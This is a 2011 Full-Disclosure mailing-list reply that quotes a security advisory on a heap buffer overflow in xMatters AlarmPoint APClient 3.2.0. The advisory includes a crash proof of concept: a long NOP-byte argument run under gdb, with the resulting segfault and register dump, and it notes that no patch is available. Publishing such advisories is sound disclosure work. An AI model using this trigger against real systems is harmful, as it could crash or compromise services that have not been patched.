On a side note, anyone here ever used any of the xmatters engines?? Care to give a small review??
On Thu, Apr 28, 2011 at 4:03 PM, Juan Sacco <jsa...@insecurityresearch.com>wrote: > Information > -------------------- > Name : Heap Buffer Overflow in xMatters AlarmPoint APClient > Version: APClient 3.2.0 (native) > Software : xMatters AlarmPoint > Vendor Homepage : http://www.xmatters.com > Vulnerability Type : Heap Buffer Overflow > Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin > Severity : High > Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com> > > Description > ------------------ > The AlarmPoint Java Server consists of a collection of software > components and software APIs designed to provide a flexible and > powerful set of tools for integrating various applications to > AlarmPoint. > > Details > ------------------- > AlarmPoint APClient is affected by a Heap Overflow vulnerability in > version APClient 3.2.0 (native) > > A heap overflow condition is a buffer overflow, where the buffer that > can be overwritten is allocated in the heap portion of memory, generally > meaning that the buffer was allocated using a routine such as the POSIX > malloc() call. > https://www.owasp.org/index.php/Heap_overflow > > > Exploit as follow: > Submit a malicious file cointaining the exploit > root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$ > ./APClient.bin --submit-file maliciousfile.hex > or > (gdb) run `python -c 'print "\x90"*16287'` > Starting program: > /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c > 'print "\x90"*16287'` > > Program received signal SIGSEGV, Segmentation fault. > 0x0804be8a in free () > (gdb) i r > eax 0xa303924 170932516 > ecx 0xbfb8 49080 > edx 0xa303924 170932516 > ebx 0x8059438 134583352 > esp 0xbfff3620 0xbfff3620 > ebp 0xbfff3638 0xbfff3638 > esi 0x8059440 134583360 > edi 0x80653f0 134632432 > eip 0x804be8a 0x804be8a <free+126> > eflags 0x210206 [ PF IF RF ID ] > cs 0x73 115 > ss 0x7b 123 > ds 0x7b 123 > es 0x7b 123 > fs 0x0 0 > gs 0x33 51 > (gdb) > > > Solution > ------------------- > No patch are available at this time. > > Credits > ------------------- > Manual discovered by Insecurity Research Labs > Juan Sacco - http://www.insecurityresearch.com > > -- > -- > _________________________________________________ > Insecurity Research - Security auditing and testing software > Web: http://www.insecurityresearch.com > Insect Pro 2.5 was released stay tunned > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
